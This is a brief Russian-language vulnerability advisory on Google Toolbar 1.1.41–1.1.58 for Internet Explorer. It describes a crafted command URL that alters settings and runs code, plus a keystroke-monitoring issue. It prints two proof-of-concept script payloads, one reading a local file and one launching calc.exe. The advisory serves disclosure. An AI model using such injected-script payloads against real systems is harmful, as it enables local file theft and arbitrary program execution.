Google Toolbar - ActiveX control для Microsoft Internet Explorer, который обеспечивает функциональность поисковой системы Google.
Обнаруженная уязвимость при посещении
определенного URL (http://toolbar.google.com/command?) позволяет изменять параметры настройки конфигурации.Уязвимость позволяет изменить конфигурацию панели инструментов,
выполнять произвольный код в пределах Local System security zone. Пример:
1. Чтение локальных файлов:
"http://toolbar.google.com/command? script=document.body.insertAdjacentHTML
('beforeEnd','<iframe id=oFileRead src=file://c:/test.txt></iframe>'); setTimeout(function () { alert(oFileRead.document.documentElement.innerText) },1000)"
2. Выполнение произвольных программ:
"http://toolbar.google.com/command? script=document.body.insertAdjacentHTML
('beforeEnd','<object classid=clsid:10101010-1111-1111-1111-111111111111 codebase=c:/winnt/system32/calc.exe style=display:none></object>')".
Также сообщается, что в некоторых версиях Google keypress события посылаются основному окну браузера. Злонамеренный сценарий в текущем окне браузера может контролировать нажатие клавиш.
Уязвимость обнаружена в Google Toolbar 1.1.41- 1.1.58.
